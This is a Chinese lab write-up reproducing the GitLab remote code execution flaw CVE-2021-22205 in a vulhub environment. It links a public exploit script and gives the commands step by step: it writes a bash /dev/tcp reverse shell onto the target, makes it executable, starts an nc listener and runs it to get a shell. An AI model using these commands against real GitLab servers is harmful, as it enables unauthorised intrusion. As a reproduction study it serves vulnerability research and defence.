漏洞复现篇--Gitlab远程命令执行漏洞
GITLAB 远程命令执行漏洞(CVE-2021-22205)
一、漏洞描述
在2021年3月16日,Gitlab发布了安全公告,公开了GITLAB 远程命令执行漏洞(CVE-2021-22205),社区版和企业版均存在的一个严重漏洞,此漏洞的CVSSv3评分为9.9。该漏洞攻击者可以实现未授权通过身份验证对gitlab服务器执行任意代码。
二、影响版本
11.9 <= GitLab(CE/EE)< 13.8.8
13.9 <= GitLab(CE/EE)< 13.9.6
13.10 <= GitLab(CE/EE)< 13.10.3
三、环境搭建
使用vulhub搭建环境
cd vulhub/gitlab/CVE-2021-22205/
docker-compose up -d
访问127.0.0.1:8080进入页面
四、漏洞复现
4.1 脚本复现
靶机:kali 192.168.101.130
攻击机:VPS(云端服务器或者自己的一台Linux虚拟机都可以)
4.1.1 脚本下载
https://github.com/Al1ex/CVE-2021-22205
4.1.2 脚本检测漏洞是否存在(需事先安装py环境)
py CVE-2021-22205.py -v true -t http://192.168.101.130:8080/
4.1.3 反弹shell
一、写入反弹shell脚本
py CVE-2021-22205.py -a true -t http://192.168.101.130/ -c "echo 'bash -i >& /dev/tcp/反弹IP地址/端口 0>&1' > /tmp/1.sh"
二、赋予shell脚本执行权限
py CVE-2021-22205.py -a true -t http://192.168.101.130:8080/ -c "chmod +x /tmp/1.sh"
三、服务器监听6666端口(未被占用的端口即可)
nc -lvvp 6666
四、获取git权限
py CVE-2021-22205.py -a true -t http://192.168.101.130:8080/ -c "/bin/bash /tmp/1.sh"
五、成功反弹执行命令
五、修复建议
Gitlab升级到最新版本
参考文章:
https://github.com/Al1ex/CVE-2021-22205
https://www.freebuf.com/articles/web/303375.html
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?